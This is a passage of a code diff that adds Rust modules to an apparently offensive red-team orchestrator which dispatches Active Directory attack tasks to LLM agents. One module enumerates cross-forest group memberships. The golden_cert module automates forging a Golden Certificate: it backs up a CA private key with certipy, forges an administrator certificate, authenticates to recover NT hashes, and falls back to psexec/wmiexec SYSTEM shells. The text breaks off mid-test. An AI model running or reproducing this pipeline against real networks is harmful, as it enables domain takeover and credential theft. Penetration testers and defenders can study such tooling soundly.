+ state.quarantine_credential("baduser", "contoso.local");
+ let work = collect_user_enum_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].credential.username, "gooduser");
+ }
+
+ #[test]
+ fn collect_dedup_key_lowercased() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("CONTOSO.LOCAL".into(), "192.168.58.10".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ let work = collect_user_enum_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].dedup_key, "user_enum:contoso.local");
+ }
+
+ #[tokio::test]
+ async fn collect_via_shared_state() {
+ let shared = SharedState::new("test-op".into());
+ {
+ let mut state = shared.write().await;
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ }
+ let state = shared.read().await;
+ let work = collect_user_enum_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].domain, "contoso.local");
+ }
+}
diff --git a/ares-cli/src/orchestrator/automation/foreign_group_enum.rs b/ares-cli/src/orchestrator/automation/foreign_group_enum.rs
new file mode 100644
index 00000000..02ab73be
--- /dev/null
+++ b/ares-cli/src/orchestrator/automation/foreign_group_enum.rs
@@ -0,0 +1,471 @@
+//! auto_foreign_group_enum -- enumerate cross-domain/cross-forest group memberships.
+//!
+//! Discovers foreign security principals (FSPs) — users/groups from one domain
+//! that are members of groups in another domain. This reveals cross-forest and
+//! cross-domain attack paths that BloodHound's intra-domain analysis might miss.
+//!
+//! Dispatches LDAP queries per trust relationship to find:
+//! - Foreign users in local groups (e.g., FABRIKAM\jdoe in CONTOSO\TrustedAdmins)
+//! - Foreign groups nested in local groups
+//! - Domain Local groups with foreign members (the primary FSP container)
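+//!
+//! The Domain Local check relies on bit `0x4` of `groupType`
+//! (ADS_GROUP_TYPE_DOMAIN_LOCAL_GROUP); the dispatched payload's bitwise
+//! matching-rule filter performs it server-side. A minimal client-side
+//! sketch of the same test (constant and function names are ours):
+//!
+//! ```
+//! const DOMAIN_LOCAL_BIT: i64 = 0x4;
+//! fn is_domain_local(group_type: i64) -> bool {
+//!     group_type & DOMAIN_LOCAL_BIT != 0
+//! }
+//! // 0x80000004 = security-enabled (0x80000000) | domain local (0x4).
+//! assert!(is_domain_local(0x8000_0004_u32 as i64));
+//! ```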
+
+use std::sync::Arc;
+use std::time::Duration;
+
+use serde_json::json;
+use tokio::sync::watch;
+use tracing::{debug, info, warn};
+
+use crate::orchestrator::dispatcher::Dispatcher;
+use crate::orchestrator::state::*;
+
+/// Collect foreign group enumeration work items from current state.
+///
+/// Pure logic extracted from `auto_foreign_group_enum` so it can be unit-tested
+/// without needing a `Dispatcher` or async runtime.
+fn collect_foreign_group_work(state: &StateInner) -> Vec<ForeignGroupWork> {
+ if state.credentials.is_empty() || state.domains.len() < 2 {
+ return Vec::new();
+ }
+
+ let mut items = Vec::new();
+
+ // For each domain, enumerate foreign security principals
+ for domain in &state.domains {
+ let dedup_key = format!("foreign_group:{domain}");
+ if state.is_processed(DEDUP_FOREIGN_GROUP_ENUM, &dedup_key) {
+ continue;
+ }
+
+ let dc_ip = match state.resolve_dc_ip(domain) {
+ Some(ip) => ip,
+ None => continue,
+ };
+
+ // Find a credential for this domain
+ let cred = state
+ .credentials
+ .iter()
+ .find(|c| {
+ !c.password.is_empty()
+ && c.domain.to_lowercase() == domain.to_lowercase()
+ && !state.is_credential_quarantined(&c.username, &c.domain)
+ })
+ .or_else(|| {
+ state.credentials.iter().find(|c| {
+ !c.password.is_empty()
+ && !state.is_credential_quarantined(&c.username, &c.domain)
+ })
+ })
+ .cloned();
+
+ let cred = match cred {
+ Some(c) => c,
+ None => continue,
+ };
+
+ items.push(ForeignGroupWork {
+ dedup_key,
+ domain: domain.clone(),
+ dc_ip,
+ credential: cred,
+ });
+ }
+
+ items
+}
+
+/// Enumerate cross-domain foreign group memberships.
+/// Interval: 45s.
+pub async fn auto_foreign_group_enum(
+ dispatcher: Arc<Dispatcher>,
+ mut shutdown: watch::Receiver<bool>,
+) {
+ let mut interval = tokio::time::interval(Duration::from_secs(45));
+ interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay);
+
+ loop {
+ tokio::select! {
+ _ = interval.tick() => {},
+ _ = shutdown.changed() => break,
+ }
+ if *shutdown.borrow() {
+ break;
+ }
+
+ if !dispatcher.is_technique_allowed("foreign_group_enum") {
+ continue;
+ }
+
+ let work: Vec<ForeignGroupWork> = {
+ let state = dispatcher.state.read().await;
+ collect_foreign_group_work(&state)
+ };
+
+ for item in work {
+ let payload = json!({
+ "technique": "foreign_group_enumeration",
+ "target_ip": item.dc_ip,
+ "domain": item.domain,
+ "credential": {
+ "username": item.credential.username,
+ "password": item.credential.password,
+ "domain": item.credential.domain,
+ },
+ "filters": [
+ "(objectClass=foreignSecurityPrincipal)",
+ "(&(objectCategory=group)(groupType:1.2.840.113556.1.4.803:=4))"
+ ],
+ "attributes": [
+ "sAMAccountName", "member", "memberOf", "objectSid",
+ "groupType", "cn", "distinguishedName"
+ ],
+ "instructions": concat!(
+ "Enumerate Foreign Security Principals and cross-domain group memberships. ",
+ "1) Query CN=ForeignSecurityPrincipals,DC=... to list all foreign SIDs. ",
+ "2) Resolve each SID to its source domain user/group using ldapsearch against ",
+ "the source domain's DC. ",
+ "3) Query Domain Local groups (groupType bit 4) and check for foreign members. ",
+ "4) Report each cross-domain membership: source_domain\\source_user -> target_group ",
+ "(target_domain). These are critical for cross-forest attack paths. ",
+ "5) Register any discovered cross-domain memberships as vulnerabilities with ",
+ "vuln_type='foreign_group_membership', source=foreign_user, target=local_group, ",
+ "domain=target_domain, source_domain=foreign_domain.\n\n",
+ "IMPORTANT: For each user discovered during FSP enumeration, include them in the ",
+ "discovered_users array with EXACTLY this JSON format:\n",
+ " {\"username\": \"samaccountname\", \"domain\": \"domain.local\", ",
+ "\"source\": \"foreign_group_enumeration\", \"memberOf\": [\"Group1\"]}\n",
+ "Include ALL users found — both foreign principals and local group members."
+ ),
+ });
+
+ let priority = dispatcher.effective_priority("foreign_group_enum");
+ match dispatcher
+ .throttled_submit("recon", "recon", payload, priority)
+ .await
+ {
+ Ok(Some(task_id)) => {
+ info!(
+ task_id = %task_id,
+ domain = %item.domain,
+ dc = %item.dc_ip,
+ "Foreign group enumeration dispatched"
+ );
+ dispatcher
+ .state
+ .write()
+ .await
+ .mark_processed(DEDUP_FOREIGN_GROUP_ENUM, item.dedup_key.clone());
+ let _ = dispatcher
+ .state
+ .persist_dedup(&dispatcher.queue, DEDUP_FOREIGN_GROUP_ENUM, &item.dedup_key)
+ .await;
+ }
+ Ok(None) => {
+ debug!(domain = %item.domain, "Foreign group enum deferred");
+ }
+ Err(e) => {
+ warn!(err = %e, domain = %item.domain, "Failed to dispatch foreign group enum");
+ }
+ }
+ }
+ }
+}
+
+struct ForeignGroupWork {
+ dedup_key: String,
+ domain: String,
+ dc_ip: String,
+ credential: ares_core::models::Credential,
+}
+
+#[cfg(test)]
+mod tests {
+ use super::*;
+
+ #[test]
+ fn dedup_key_format() {
+ let key = format!("foreign_group:{}", "contoso.local");
+ assert_eq!(key, "foreign_group:contoso.local");
+ }
+
+ #[test]
+ fn dedup_set_name() {
+ assert_eq!(DEDUP_FOREIGN_GROUP_ENUM, "foreign_group_enum");
+ }
+
+ #[test]
+ fn requires_multiple_domains() {
+ let domains: Vec<String> = vec!["contoso.local".to_string()];
+ assert!(
+ domains.len() < 2,
+ "Single domain should skip foreign group enum"
+ );
+ }
+
+ #[test]
+ fn two_domains_meets_requirement() {
+ let domains: Vec<String> = vec!["contoso.local".to_string(), "fabrikam.local".to_string()];
+ assert!(domains.len() >= 2);
+ }
+
+ #[test]
+ fn payload_structure_has_correct_technique() {
+ let cred = ares_core::models::Credential {
+ id: "c1".into(),
+ username: "admin".into(),
+ password: "P@ssw0rd!".into(), // pragma: allowlist secret
+ domain: "contoso.local".into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ };
+ let payload = json!({
+ "technique": "foreign_group_enumeration",
+ "target_ip": "192.168.58.10",
+ "domain": "contoso.local",
+ "credential": {
+ "username": cred.username,
+ "password": cred.password,
+ "domain": cred.domain,
+ },
+ });
+ assert_eq!(payload["technique"], "foreign_group_enumeration");
+ assert_eq!(payload["target_ip"], "192.168.58.10");
+ assert_eq!(payload["domain"], "contoso.local");
+ assert_eq!(payload["credential"]["username"], "admin");
+ }
+
+ #[test]
+ fn work_struct_construction() {
+ let cred = ares_core::models::Credential {
+ id: "c1".into(),
+ username: "admin".into(),
+ password: "P@ssw0rd!".into(), // pragma: allowlist secret
+ domain: "contoso.local".into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ };
+ let work = ForeignGroupWork {
+ dedup_key: "foreign_group:contoso.local".into(),
+ domain: "contoso.local".into(),
+ dc_ip: "192.168.58.10".into(),
+ credential: cred,
+ };
+ assert_eq!(work.domain, "contoso.local");
+ assert_eq!(work.dc_ip, "192.168.58.10");
+ assert_eq!(work.credential.username, "admin");
+ }
+
+ #[test]
+ fn dedup_key_per_domain() {
+ let key1 = format!("foreign_group:{}", "contoso.local");
+ let key2 = format!("foreign_group:{}", "fabrikam.local");
+ assert_ne!(key1, key2);
+ }
+
+ #[test]
+ fn foreign_security_principal_resolution() {
+ // The payload includes credential for cross-domain FSP resolution
+ let payload = json!({
+ "technique": "foreign_group_enumeration",
+ "target_ip": "192.168.58.10",
+ "domain": "contoso.local",
+ "credential": {
+ "username": "admin",
+ "password": "P@ssw0rd!",
+ "domain": "contoso.local",
+ },
+ });
+ // FSP resolution happens via the credential against the target domain
+ assert!(payload.get("credential").is_some());
+ assert_eq!(payload["technique"], "foreign_group_enumeration");
+ }
+
+ fn make_credential(
+ username: &str,
+ password: &str,
+ domain: &str,
+ ) -> ares_core::models::Credential {
+ ares_core::models::Credential {
+ id: format!("c-{username}"),
+ username: username.into(),
+ password: password.into(), // pragma: allowlist secret
+ domain: domain.into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ }
+ }
+
+ #[test]
+ fn collect_empty_state_no_work() {
+ let state = StateInner::new("test-op".into());
+ let work = collect_foreign_group_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_single_domain_no_work() {
+ let mut state = StateInner::new("test-op".into());
+ state.domains.push("contoso.local".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ let work = collect_foreign_group_work(&state);
+ // Requires at least 2 domains
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_no_credentials_no_work() {
+ let mut state = StateInner::new("test-op".into());
+ state.domains.push("contoso.local".into());
+ state.domains.push("fabrikam.local".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .domain_controllers
+ .insert("fabrikam.local".into(), "192.168.58.20".into());
+ let work = collect_foreign_group_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_two_domains_with_creds() {
+ let mut state = StateInner::new("test-op".into());
+ state.domains.push("contoso.local".into());
+ state.domains.push("fabrikam.local".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .domain_controllers
+ .insert("fabrikam.local".into(), "192.168.58.20".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state
+ .credentials
+ .push(make_credential("fadmin", "Pass!456", "fabrikam.local")); // pragma: allowlist secret
+ let work = collect_foreign_group_work(&state);
+ assert_eq!(work.len(), 2);
+ }
+
+ #[test]
+ fn collect_dedup_skips_processed() {
+ let mut state = StateInner::new("test-op".into());
+ state.domains.push("contoso.local".into());
+ state.domains.push("fabrikam.local".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .domain_controllers
+ .insert("fabrikam.local".into(), "192.168.58.20".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state.mark_processed(
+ DEDUP_FOREIGN_GROUP_ENUM,
+ "foreign_group:contoso.local".into(),
+ );
+ let work = collect_foreign_group_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].domain, "fabrikam.local");
+ }
+
+ #[test]
+ fn collect_skips_domain_without_dc() {
+ let mut state = StateInner::new("test-op".into());
+ state.domains.push("contoso.local".into());
+ state.domains.push("fabrikam.local".into());
+ // Only contoso has a DC
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ let work = collect_foreign_group_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].domain, "contoso.local");
+ }
+
+ #[test]
+ fn collect_quarantined_credential_falls_back() {
+ let mut state = StateInner::new("test-op".into());
+ state.domains.push("contoso.local".into());
+ state.domains.push("fabrikam.local".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .domain_controllers
+ .insert("fabrikam.local".into(), "192.168.58.20".into());
+ state
+ .credentials
+ .push(make_credential("baduser", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state
+ .credentials
+ .push(make_credential("gooduser", "Pass!456", "fabrikam.local")); // pragma: allowlist secret
+ state.quarantine_credential("baduser", "contoso.local");
+ let work = collect_foreign_group_work(&state);
+ // Both domains should still get work (gooduser fallback for contoso)
+ assert_eq!(work.len(), 2);
+ // contoso should fall back to gooduser
+ let contoso_work = work.iter().find(|w| w.domain == "contoso.local").unwrap();
+ assert_eq!(contoso_work.credential.username, "gooduser");
+ }
+
+ #[test]
+ fn collect_skips_empty_password() {
+ let mut state = StateInner::new("test-op".into());
+ state.domains.push("contoso.local".into());
+ state.domains.push("fabrikam.local".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .domain_controllers
+ .insert("fabrikam.local".into(), "192.168.58.20".into());
+ state
+ .credentials
+ .push(make_credential("admin", "", "contoso.local"));
+ let work = collect_foreign_group_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[tokio::test]
+ async fn collect_via_shared_state() {
+ let shared = SharedState::new("test-op".into());
+ {
+ let mut state = shared.write().await;
+ state.domains.push("contoso.local".into());
+ state.domains.push("fabrikam.local".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .domain_controllers
+ .insert("fabrikam.local".into(), "192.168.58.20".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ }
+ let state = shared.read().await;
+ let work = collect_foreign_group_work(&state);
+ assert_eq!(work.len(), 2);
+ }
+}
diff --git a/ares-cli/src/orchestrator/automation/golden_cert.rs b/ares-cli/src/orchestrator/automation/golden_cert.rs
new file mode 100644
index 00000000..c643cf49
--- /dev/null
+++ b/ares-cli/src/orchestrator/automation/golden_cert.rs
@@ -0,0 +1,525 @@
+//! auto_golden_cert -- forge a Golden Certificate after owning an ADCS CA host.
+//!
+//! When a CA host is fully owned (local SYSTEM via lateral movement) and the
+//! CA's domain is not yet dominated, drive the offline Golden Certificate
+//! pipeline:
+//!
+//! 1. **Backup**: `certipy ca -backup` extracts the CA private key + cert
+//! to a PFX (requires SYSTEM/local admin or CA admin rights — owning the
+//! CA host satisfies this).
+//! 2. **Forge**: `certipy forge -ca-pfx <ca.pfx> -upn administrator@<domain>`
+//! produces a client-auth certificate signed by the CA, for any UPN.
+//! No DC interaction is needed — purely offline.
+//! 3. **Auth**: `certipy auth -pfx forged.pfx -dc-ip <dc_ip>` performs PKINIT
+//! to obtain the target user's NT hash.
+//!
+//! This is the universal terminal for cross-forest compromise: every ADCS-
+//! adjacent attack path (ESC1/ESC4/ESC8, MSSQL→xp_cmdshell→host, RBCD →
+//! S4U → SYSTEM, shadow creds → admin → host) converges here once the CA
+//! host is owned, regardless of which forest the CA lives in.
+//!
+//! Cross-forest note: the CA's *own* domain credential is what we need for
+//! the `certipy ca -backup` RPC call. We pull it via `find_source_credential`
+//! / `find_trust_credential` so a cred from the originating forest works
+//! when there is no same-domain cred yet.
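+//!
+//! End-to-end sketch with illustrative values (CA name, IPs, and file names
+//! are placeholders; flag spelling follows Certipy 4.x as we recall, so
+//! verify against the installed version):
+//!
+//! ```text
+//! certipy ca    -u '<user>@contoso.local' -p '<password>' -target-ip 192.168.58.50 -ca 'CONTOSO-CA' -backup
+//! certipy forge -ca-pfx 'CONTOSO-CA.pfx' -upn 'administrator@contoso.local'
+//! certipy auth  -pfx 'administrator_forged.pfx' -dc-ip 192.168.58.10
+//! ```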
+
+use std::sync::Arc;
+use std::time::Duration;
+
+use serde_json::json;
+use tokio::sync::watch;
+use tracing::{debug, info, warn};
+
+use crate::orchestrator::dispatcher::Dispatcher;
+use crate::orchestrator::state::*;
+
+/// Watches for owned CA hosts and dispatches Golden Certificate pipelines.
+/// Interval: 30s.
+pub async fn auto_golden_cert(dispatcher: Arc<Dispatcher>, mut shutdown: watch::Receiver<bool>) {
+ let mut interval = tokio::time::interval(Duration::from_secs(30));
+ interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay);
+
+ loop {
+ tokio::select! {
+ _ = interval.tick() => {},
+ _ = shutdown.changed() => break,
+ }
+ if *shutdown.borrow() {
+ break;
+ }
+
+ if !dispatcher.is_technique_allowed("golden_cert") {
+ continue;
+ }
+
+ let work: Vec<GoldenCertWork> = {
+ let state = dispatcher.state.read().await;
+ collect_golden_cert_work(&state)
+ };
+
+ for item in work {
+ let mut payload = json!({
+ "technique": "golden_cert",
+ "ca_host": item.ca_host,
+ "ca_hostname": item.ca_hostname,
+ "domain": item.domain,
+ "target_user": "administrator",
+ "target_upn": format!("administrator@{}", item.domain),
+ "credential": {
+ "username": item.credential.username,
+ "password": item.credential.password,
+ "domain": item.credential.domain,
+ },
+ "username": item.credential.username,
+ "password": item.credential.password,
+ "objectives": [
+ "Step 1 (backup): run `certipy_ca` with backup=true, ca=, username/password from credential, dc_ip=. Requires SYSTEM or CA admin on the CA host — since this host is owned, you can also run a SYSTEM shell (psexec/wmiexec) and execute certipy locally.",
+ "Step 2 (forge): run `certipy_forge` with ca_pfx=, upn=`administrator@`. Output is a forged client-auth certificate signed by the CA private key — no DC interaction needed.",
+ "Step 3 (auth): run `certipy_auth` with pfx_path=, domain=, dc_ip= to PKINIT-authenticate as administrator and recover the NT hash.",
+ "If you don't yet know the CA name, run `certipy_find` first against this host to discover it (the CA's `Name` / `DNS Name`).",
+ "If `certipy_ca -backup` fails with an RPC/perm error from a network cred, fall back to a local SYSTEM shell (psexec/wmiexec to ca_host) and run certipy from there — the host is owned.",
+ ],
+ });
+
+ if let Some(ref dc) = item.dc_ip {
+ payload["dc_ip"] = json!(dc);
+ payload["target_ip"] = json!(dc);
+ }
+ if let Some(ref ca_name) = item.ca_name {
+ payload["ca_name"] = json!(ca_name);
+ }
+ if let Some(ref sid) = item.domain_sid {
+ payload["domain_sid"] = json!(sid);
+ payload["admin_sid"] = json!(format!("{sid}-500"));
+ }
+
+ let priority = dispatcher.effective_priority("golden_cert");
+ match dispatcher
+ .throttled_submit("exploit", "credential_access", payload, priority)
+ .await
+ {
+ Ok(Some(task_id)) => {
+ info!(
+ task_id = %task_id,
+ ca_host = %item.ca_host,
+ domain = %item.domain,
+ "Golden Certificate pipeline dispatched"
+ );
+ dispatcher
+ .state
+ .write()
+ .await
+ .mark_processed(DEDUP_GOLDEN_CERT, item.dedup_key.clone());
+ let _ = dispatcher
+ .state
+ .persist_dedup(&dispatcher.queue, DEDUP_GOLDEN_CERT, &item.dedup_key)
+ .await;
+ }
+ Ok(None) => {
+ debug!(ca_host = %item.ca_host, "Golden Cert deferred by throttler");
+ }
+ Err(e) => {
+ warn!(err = %e, ca_host = %item.ca_host, "Failed to dispatch Golden Cert");
+ }
+ }
+ }
+ }
+}
+
+/// Pure logic so it can be unit-tested without a `Dispatcher` or runtime.
+fn collect_golden_cert_work(state: &StateInner) -> Vec<GoldenCertWork> {
+ state
+ .hosts
+ .iter()
+ .filter(|h| h.owned)
+ .filter_map(|h| {
+ let host_lower = h.ip.to_lowercase();
+ let hostname_lower = h.hostname.to_lowercase();
+
+ let is_ca = state.shares.iter().any(|s| {
+ s.name.to_lowercase() == "certenroll"
+ && (s.host == h.ip || s.host.to_lowercase() == hostname_lower)
+ });
+ if !is_ca {
+ return None;
+ }
+
+ let domain = extract_domain_from_fqdn(&h.hostname).and_then(|d| {
+ if state.domains.iter().any(|known| known.to_lowercase() == d) {
+ Some(d)
+ } else {
+ state
+ .domains
+ .iter()
+ .find(|known| d.ends_with(&format!(".{}", known.to_lowercase())))
+ .or_else(|| {
+ state
+ .domains
+ .iter()
+ .find(|known| known.to_lowercase().ends_with(&format!(".{d}")))
+ })
+ .cloned()
+ .or(Some(d))
+ }
+ })?;
+
+ // Don't forge a Golden Cert against a domain we already own.
+ if state.dominated_domains.contains(&domain) {
+ return None;
+ }
+
+ let dedup_key = format!("{}:{}", host_lower, domain.to_lowercase());
+ if state.is_processed(DEDUP_GOLDEN_CERT, &dedup_key) {
+ return None;
+ }
+
+ // The certipy_ca call needs a credential that authenticates to the
+ // CA host's domain. Try same-domain first, then trusted-domain
+ // (cross-forest) as fallback.
+ let same_domain = state
+ .credentials
+ .iter()
+ .find(|c| {
+ !c.password.is_empty()
+ && c.domain.to_lowercase() == domain.to_lowercase()
+ && !c.username.starts_with('$')
+ && !state.is_delegation_account(&c.username)
+ && !state.is_credential_quarantined(&c.username, &c.domain)
+ })
+ .cloned();
+
+ let credential = same_domain.or_else(|| state.find_trust_credential(&domain))?;
+
+ let dc_ip = state
+ .domain_controllers
+ .get(&domain.to_lowercase())
+ .cloned();
+
+ let domain_sid = state.domain_sids.get(&domain.to_lowercase()).cloned();
+
+ let ca_name = lookup_ca_name(state, &h.ip, &h.hostname);
+
+ Some(GoldenCertWork {
+ ca_host: h.ip.clone(),
+ ca_hostname: h.hostname.clone(),
+ dedup_key,
+ domain,
+ dc_ip,
+ domain_sid,
+ ca_name,
+ credential,
+ })
+ })
+ .collect()
+}
+
+/// Extract the domain portion of an FQDN ("ca01.contoso.local" -> "contoso.local").
+fn extract_domain_from_fqdn(fqdn: &str) -> Option<String> {
+ fqdn.to_lowercase()
+ .split_once('.')
+ .map(|(_, d)| d.to_string())
+}
+
+/// Look up a CA name from previously-discovered ADCS vulns on this host.
+/// Falls back to None if no `certipy_find` result has populated `ca_name` yet —
+/// the LLM agent is instructed to run certipy_find first when this is missing.
+fn lookup_ca_name(state: &StateInner, host_ip: &str, hostname: &str) -> Option<String> {
+ let host_l = host_ip.to_lowercase();
+ let hn_l = hostname.to_lowercase();
+ state
+ .discovered_vulnerabilities
+ .values()
+ .filter(|v| {
+ let t = v.target.to_lowercase();
+ t == host_l || t == hn_l
+ })
+ .find_map(|v| {
+ for key in &["ca_name", "CA", "ca"] {
+ if let Some(s) = v.details.get(*key).and_then(|x| x.as_str()) {
+ if !s.is_empty() {
+ return Some(s.to_string());
+ }
+ }
+ }
+ None
+ })
+}
+
+struct GoldenCertWork {
+ ca_host: String,
+ ca_hostname: String,
+ dedup_key: String,
+ domain: String,
+ dc_ip: Option<String>,
+ domain_sid: Option<String>,
+ ca_name: Option<String>,
+ credential: ares_core::models::Credential,
+}
+
+#[cfg(test)]
+mod tests {
+ use super::*;
+ use ares_core::models::{Credential, Host, Share};
+
+ fn make_credential(username: &str, password: &str, domain: &str) -> Credential {
+ Credential {
+ id: format!("c-{username}"),
+ username: username.into(),
+ password: password.into(), // pragma: allowlist secret
+ domain: domain.into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ }
+ }
+
+ fn make_host(ip: &str, hostname: &str, owned: bool) -> Host {
+ Host {
+ ip: ip.into(),
+ hostname: hostname.into(),
+ os: String::new(),
+ roles: Vec::new(),
+ services: Vec::new(),
+ is_dc: false,
+ owned,
+ }
+ }
+
+ fn make_share(host: &str, name: &str) -> Share {
+ Share {
+ host: host.into(),
+ name: name.into(),
+ permissions: String::new(),
+ comment: String::new(),
+ }
+ }
+
+ #[test]
+ fn dedup_set_name() {
+ assert_eq!(DEDUP_GOLDEN_CERT, "golden_cert");
+ }
+
+ #[test]
+ fn extract_domain_typical() {
+ assert_eq!(
+ extract_domain_from_fqdn("ca01.contoso.local"),
+ Some("contoso.local".to_string())
+ );
+ }
+
+ #[test]
+ fn extract_domain_case_insensitive() {
+ assert_eq!(
+ extract_domain_from_fqdn("CA01.CONTOSO.LOCAL"),
+ Some("contoso.local".to_string())
+ );
+ }
+
+ #[test]
+ fn extract_domain_bare_hostname() {
+ assert_eq!(extract_domain_from_fqdn("ca01"), None);
+ }
+
+ #[test]
+ fn collect_empty_state_returns_no_work() {
+ let state = StateInner::new("test-op".into());
+ let work = collect_golden_cert_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_unowned_ca_host_skipped() {
+ let mut state = StateInner::new("test-op".into());
+ state.shares.push(make_share("192.168.58.50", "CertEnroll"));
+ state
+ .hosts
+ .push(make_host("192.168.58.50", "ca01.contoso.local", false));
+ state.domains.push("contoso.local".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ let work = collect_golden_cert_work(&state);
+ assert!(work.is_empty(), "unowned CA host should not yield work");
+ }
+
+ #[test]
+ fn collect_owned_non_ca_host_skipped() {
+ let mut state = StateInner::new("test-op".into());
+ // Owned host but no CertEnroll share
+ state
+ .hosts
+ .push(make_host("192.168.58.20", "fs01.contoso.local", true));
+ state.domains.push("contoso.local".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ let work = collect_golden_cert_work(&state);
+ assert!(work.is_empty(), "non-CA owned host should not yield work");
+ }
+
+ #[test]
+ fn collect_owned_ca_with_same_domain_cred_yields_work() {
+ let mut state = StateInner::new("test-op".into());
+ state.shares.push(make_share("192.168.58.50", "CertEnroll"));
+ state
+ .hosts
+ .push(make_host("192.168.58.50", "ca01.contoso.local", true));
+ state.domains.push("contoso.local".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ let work = collect_golden_cert_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].ca_host, "192.168.58.50");
+ assert_eq!(work[0].ca_hostname, "ca01.contoso.local");
+ assert_eq!(work[0].domain, "contoso.local");
+ assert_eq!(work[0].credential.username, "admin");
+ assert_eq!(work[0].dedup_key, "192.168.58.50:contoso.local");
+ }
+
+ #[test]
+ fn collect_dominated_domain_skipped() {
+ let mut state = StateInner::new("test-op".into());
+ state.shares.push(make_share("192.168.58.50", "CertEnroll"));
+ state
+ .hosts
+ .push(make_host("192.168.58.50", "ca01.contoso.local", true));
+ state.domains.push("contoso.local".into());
+ state.dominated_domains.insert("contoso.local".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ let work = collect_golden_cert_work(&state);
+ assert!(
+ work.is_empty(),
+ "should not forge against an already-dominated domain"
+ );
+ }
+
+ #[test]
+ fn collect_dedup_skips_processed() {
+ let mut state = StateInner::new("test-op".into());
+ state.shares.push(make_share("192.168.58.50", "CertEnroll"));
+ state
+ .hosts
+ .push(make_host("192.168.58.50", "ca01.contoso.local", true));
+ state.domains.push("contoso.local".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state.mark_processed(DEDUP_GOLDEN_CERT, "192.168.58.50:contoso.local".into());
+ let work = collect_golden_cert_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_no_credential_skipped() {
+ let mut state = StateInner::new("test-op".into());
+ state.shares.push(make_share("192.168.58.50", "CertEnroll"));
+ state
+ .hosts
+ .push(make_host("192.168.58.50", "ca01.contoso.local", true));
+ state.domains.push("contoso.local".into());
+ // No credentials at all
+ let work = collect_golden_cert_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_resolves_dc_ip_when_available() {
+ let mut state = StateInner::new("test-op".into());
+ state.shares.push(make_share("192.168.58.50", "CertEnroll"));
+ state
+ .hosts
+ .push(make_host("192.168.58.50", "ca01.contoso.local", true));
+ state.domains.push("contoso.local".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ let work = collect_golden_cert_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].dc_ip.as_deref(), Some("192.168.58.10"));
+ }
+
+ #[test]
+ fn collect_certenroll_case_insensitive() {
+ let mut state = StateInner::new("test-op".into());
+ state.shares.push(make_share("192.168.58.50", "certenroll"));
+ state
+ .hosts
+ .push(make_host("192.168.58.50", "ca01.contoso.local", true));
+ state.domains.push("contoso.local".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
